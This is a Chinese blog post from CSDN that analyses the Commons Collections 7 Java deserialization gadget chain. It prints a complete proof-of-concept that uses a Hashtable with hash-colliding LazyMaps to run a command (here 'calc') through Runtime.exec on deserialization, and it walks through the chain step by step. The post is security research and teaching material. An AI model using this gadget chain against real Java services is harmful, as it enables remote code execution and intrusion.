java7安全站点_Java安全之Commons Collections7分析

最新推荐文章于 2024-07-09 14:45:00 发布
最新推荐文章于 2024-07-09 14:45:00 发布
阅读量191 收藏
点赞数
文章标签: java7安全站点
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32323455/article/details/114758771
版权

Java安全之Commons Collections7分析

0x00 前言

本文讲解的该链是原生ysoserial中的最后一条CC链,但是实际上并不是的。在后来随着后面各位大佬们挖掘利用链,CC8,9,10的链诞生,也被内置到ysoserial里面。在该链中其实和CC6也是类似,但是CC7利用链中是使用Hashtable作为反序列化的入口点。

0x01 POC分析

package com.test;

import org.apache.commons.collections.Transformer;

import org.apache.commons.collections.functors.ChainedTransformer;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.map.LazyMap;

import java.io.*;

import java.lang.reflect.Field;

import java.util.HashMap;

import java.util.Hashtable;

import java.util.Map;

public class cc7 {

public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {

// Reusing transformer chain and LazyMap gadgets from previous payloads

final String[] execArgs = new String[]{"calc"};

final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});

final Transformer[] transformers = new Transformer[]{

new ConstantTransformer(Runtime.class),

new InvokerTransformer("getMethod",

new Class[]{String.class, Class[].class},

new Object[]{"getRuntime", new Class[0]}),

new InvokerTransformer("invoke",

new Class[]{Object.class, Object[].class},

new Object[]{null, new Object[0]}),

new InvokerTransformer("exec",

new Class[]{String.class},

execArgs),

new ConstantTransformer(1)};

Map innerMap1 = new HashMap();

Map innerMap2 = new HashMap();

// Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject

Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);

lazyMap1.put("yy", 1);

Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);

lazyMap2.put("zZ", 1);

// Use the colliding Maps as keys in Hashtable

Hashtable hashtable = new Hashtable();

hashtable.put(lazyMap1, 1);

hashtable.put(lazyMap2, 2);

Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");

iTransformers.setAccessible(true);

iTransformers.set(transformerChain,transformers);

// Reflections.setFieldValue(transformerChain, "iTransformers", transformers);

// Needed to ensure hash collision after previous manipulations

lazyMap2.remove("yy");

ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test1.out"));

objectOutputStream.writeObject(hashtable);

objectOutputStream.close();

ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test1.out"));

objectInputStream.readObject();

// return hashtable;

}

}

这里依旧是提取重要代码出来去做了一个简化。

抛去和前面重复的部分,下面分为三段代码去进行分析。

Map innerMap1 = new HashMap();

Map innerMap2 = new HashMap();

// Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject

Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);

lazyMap1.put("yy", 1);

Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);

lazyMap2.put("zZ", 1);

Hashtable hashtable = new Hashtable();

hashtable.put(lazyMap1, 1);

hashtable.put(lazyMap2, 2);

在这段代码中,实例化了两个HashMap,并对两个HashMap使用了LazyMap将transformerChain和HashMap

绑定到一起。然后分别添加到Hashtable中, 但是前面看到的都是使用一次,为什么这里需要重复2次重复的操作呢?

下面来分析一下。

Hashtable的reconstitutionPut方法是被遍历调用的,

ba64041a1b743d24a181d1ebe1c227c4.png

88841c1c1f65338f2206a171588067b9.png

第一次调用的时候,并不会走入到reconstitutionPut方法for循环里面,因为tab[index]的内容是空的,在下面会对tab[index]进行赋值。在第二次调用reconstitutionPut时,tab中才有内容,我们才有机会进入到这个for循环中,从而调用equals方法。这也是为什么要调用两次put的原因。

Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");

iTransformers.setAccessible(true);

iTransformers.set(transformerChain,transformers);

lazyMap2.remove("yy");

前面的三段代码其实就是为了防止在序列化的时候,本地进行命令执行,前面先定义好一个空的,后面再使用反射将他的iTransformers进行替换。

其实最主要的是后面的lazyMap2.remove这个步骤。至于为什么需要在最后面移除该值,其实在LazyMap的get方法里面就可以看到。

b1a689ae320a0d7e4b5adb1c2cfd7ade.png

如果不移除该方法就会走不进该判断条件的代码块中。而后面也会再调用一次put方法。

0x02 POC调试

依旧是在readobjetc的复写点打一个断点,这里面用到的是Hashtable的readobjetc作为入口点。

78b87eefa21e15eb37eb87f50207c708.png

在其中会调用到reconstitutionPut方法,跟进一下。

273478ba982edb8d6fd1e6968cf5ada2.png

前面说过,第一遍调用的时候,tab[index]是为空的,需要跟进到第二步的执行里面去查看。

54f2435fe020bdf6b7702293908d7df2.png

在第二遍执行的时候就会进行到for循环里面,并且调用到key的equals方法。跟进一下该方法。

4a7557b2e497eb9078acf159354fdc8b.png

AbstractMapDecorator的equals方法会去调用this.map的equals。跟进一下。

1fb01fe99799aeebcc1c00f84be9a447.png

下面代码还会继续调用m.get方法,在这里的m为LazyMap对象。

在最后就来到了LazyMap.get这一步,其实就比较清晰了。后面的和前面分析的几条链都一样。这里就不做分析了。

27ef002e8b5572de8cb7a7181272c920.png

0x03 结尾

分析完了这一系列的CC链,后面就打算分析Fastjson、shiro、weblogic等反序列化漏洞,再后面就是开始写反序列化工具集了。

Playmz
关注
Java反序列化(九)Common Collection 7分析
Vicl1fe的博客
09-29 370
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 先放出完整的POC package
反序列化渗透与攻防(二)之Java反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-12 1126
JAVA反序列化漏洞到底是如何产生的?1、由于很多站点或者RMI仓库等接口处存在java的反序列化功能,于是攻击者可以通过构造特定的恶意对象后的流,让目标反序列化,从而达到自己的恶意预期行为,包括命令执行,甚至 getshell 等等。2、Commons Collections是开源小组Apache研发的一个 Collections 收集器框架。
Java安全CommonsCollections7
XINO
08-17 522
Hashtable在调用put方法添加元素的时候会调用equals方法判断是否为同一对象,而在equals中会调用LazyMap的get方法添加一个元素(yy=yy),如果lazyMap2和lazyMap1中的元素个数不一样则直接返回false,那么也就不会触发漏洞。所以我们可以这样:在添加第二个元素后,lazyMap2需要调用remove方法删除元素。...
Commons-Collections篇-CC7链
最新发布
鸣蜩十四的博客
07-09 1013
和CC5反序列化链相似,CC7也是后半条LazyMap执行命令链不变,但是中间过程通过AbstractMap.equals()触发LazyMap.get()方法。
[Java反序列化]—CommonsCollections7(CC完结篇)
Sentiment的博客
06-05 1216
CC7其实又跟CC5差不多,也是换了另一种方式来调用 流程 还是现根据链子先看下流程吧。中重写了,最后会调用 中,调用了方法— 所以就要看下哪里的()有问题,找到了类 最后还会retrun map.equals(object);,所以就要找下个,在中找到了 最后调用了方法,所以如果构造m为LazyMap对象,就可以成功向下执行 分析 在网上找了一些分析笔记但感觉分析的都不是很详细,而且这里涉及很多数据结构的内容,所以我这里也是尽可能的详细分析一下首先在执行readObject后,会在1173行对赋值,赋值后
apache-commons-collections7反序列化链分析
12-02 240
apache-commons-collections7反序列化链分析 apache-commons-collections7反序列化链也是对ACC1链的变形利用罢了,倒是其中涉及一些hash知识 复现环境 JDK7+CommonsCollections1 前景知识 这里要在前面说一下的是Hashtable.put方法新增的元素,是存储在Hashtable$Entry这个内部类里面的,那么获取元素也是在这个内部类获取的,这个跟进一下Hashtable.put方法就能知道 LazyMap.put方法新增的元素,
Java代码审计——Commons Collections7 HashTable
王嘟嘟的博客
12-15 1178
0x00 前言 最后的这几条链基本上就都是第三段的利用方式了,基本上拼接到A和B就可以了。 0x01 HashTable 这里是通过HashTable来进行触发LazyMap的。首先肯定是要来看一下HashTable的readObject方法。 在HashTable中readObject方法中,调用了reconstitutionPut方法,在reconstitutionPut中最主要的是map,而map是Entry类型的,我们可以通过put方式进行赋值 poc: hashtable.put(lazyMa
Java代码审计漏洞挖掘(入门)
Ms08067安全实验室
11-10 4667
出品|MS08067实验室(www.ms08067.com)双十一最有意义的事情莫过于是学习一门高级渗透技术了!代码审计属于高级渗透测试服务的一环,顾名思义就是检查源代码中的安全缺陷,检查...
开发知识点-JAVA-springboot+Spring Security/Shiro
aming小老弟
02-18 547
Spring 还提供了一个名为 Spring Security 的子项目,用于处理应用程序的安全需求。Spring Security 可以与 Shiro 集成,以提供更强大的安全功能。Shiro 提供了一套灵活的安全管理功能,可以处理用户身份验证、访问控制、会话管理等任务。因此,可以说 Shiro 是一个独立的安全框架,而 Spring 平台可以与 Shiro 一起使用来增强应用程序的安全性。Shiro 和 Spring 平台是两个不同的项目,它们可以在一起使用来提供安全认证和授权功能。
JAVA面试、笔试题
weixin_45689111的博客
04-20 1万+
@[TOC]目录 JAVA面试、笔试题 @目录 一、 CoreJava部分 7 1. java中有哪些基本类型? 7 2. java反射 7 3. 易错,理解题 7 4. Java有几种创建对象的方法? 8 java为什么能够跨平台运行? 8 整型数据转换成字符串的方式? 8 String是基本数据类型吗?我可不可以写个类继承于String? 8 谈谈&和&&的区别? 8 Switch语句里面的条件可不可以是byte、long、String?使用时候还应注意什么? 8 short
史上最全Java面试题大汇总「百题附答案」
热门推荐
qq_39652397的博客
03-17 2万+
前言 整理这些面试题源于在微信群和几个刚入职的小伙伴们的一次讨论,很多小伙伴谈了自己的面试经历和体会,很多人最初鄙视刷题党,觉得开发技能最重要,但在短暂的面试过程中很挫败。转而去看面试题,但是网上面试题太多但又不全,查找很不方便,多是看过的又看,看十道才能看到面试的题目,极大的浪费了求职期间的宝贵时间。 最后大家一拍即合,准备各自把面试笔试以及自己看过好的题目收集起来,整理出来让后来的小伙伴们少踩些坑,所以有了这些题目。 目录 赢在面试之Java基础篇(1) 1、一个".java"源文件中是否可以
commons-io-2.6.zip
03-23
commons-io 是 Apache 开源基金组织提供的一组有关 IO 操作的类库,可以挺提高 IO 功能开发的效率。commons-io 工具包提供了很多有关 IO 操作的类
CommonsCollections 3~7分析
qq_31065143的博客
04-05 348
CommonsCollections 3~7分析 前言 看完了CC1和CC2后面的内容都简单的多了,所以就一起分析一下。 CC3 测试环境 jdk1.7 Commons Collections 4.0 漏洞分析 cc3和cc1和cc2蛮像的,就是cc1+cc2的变种,在cc3中引入了新的类TrAXFilter和InstantiateTransformer。在cc2中是利用InvokeTransform触发newTransFormer进行命令执行的,而在cc3中,则是通过TrAXFilter触发NewTr
组策略java安全站点_在拥有本地服务器权限情况下的组策略安全研究
weixin_39760619的博客
02-27 326
组策略介绍组策略(Group Policy)是微软Windows NT家族操作系统的一个特性,它可以控制用户帐户和计算机帐户的工作环境。组策略提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。在安全性方面组策略设置是由目标应用程序自愿实施的。在许多情况下,这只是禁止访问特定功能的用户接口。另外,恶意用户可以修改或干扰应用程序,使其不能成功读取组策略设置,从而实行更低或者默认的安全设置...
java--CommonsCollections7 学习
zyer
05-31 244
根据之前的学习,发现看cc7应该很简单了。(环境:JDK8u311) cc6使用了HashMap和HashSet,cc7使用的是Hashtable Hashtable 与 HashMap 十分相似,是一种 key-value 形式的哈希表,但仍然存在一些区别: HashMap 继承 AbstractMap,而 Hashtable 继承 Dictionary ,可以说是一个过时的类。 两者内部基本都是使用“数组-链表”的结构,但是 HashMap 引入了红黑树的实现。 Hasht
java 可信任站点_java-在非安全网络上建立可信任安全的通道(2/3)
weixin_33169898的博客
02-25 139
在不安全的网络环境下进行密钥交互(1/3,前面那一节),容易遭受中间人攻击,什么是中间人攻击,请google it。通信的双方必须是相互信任的,在这个基础上再进行密钥协商才是可靠的。那么,如何建立信任关系呢?我以前的几篇博文介绍了用如何 用 Java编程方式生成CA证书 以及用CA证书签发客户证书。现在假设,Alice和Bob的证书都是被同一个CA atlas签发的(见我前面的博文),那么他们之...
java7安全站点,保密性、安全性和站点策略概述
weixin_33054847的博客
03-21 160
保密性、安全性和站点策略概述Instant Messaging 提供对 Instant Messaging 功能的控制访问和保留最终用户保密性的功能。站点策略站点策略指定最终用户对 Instant Messaging 中特定功能的访问。站点策略指定以下功能:访问其他最终用户的在线状态向其他最终用户发送警报将属性保存在服务器上创建和管理会议室创建和管理新闻频道Instant Messaging 管理...
linux增加java安全站点,搭建Java Developer Linux站点
weixin_42121412的博客
05-11 144
CentOS基本命令cd /dir 进入指定目录ls dir 查看指定目录下的内容ll dir 查看指定目录下内容的详细信息mkdir $HOME/folder 新建目录mkdir -p ~/a/b 创建多层目录mv $HOME/folder /var/tmp 移动目录并命名为新目录cp file1 file2 复制文件并重命名cp -r dir1 dir2 复制目录并重命名rm –rf fold...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值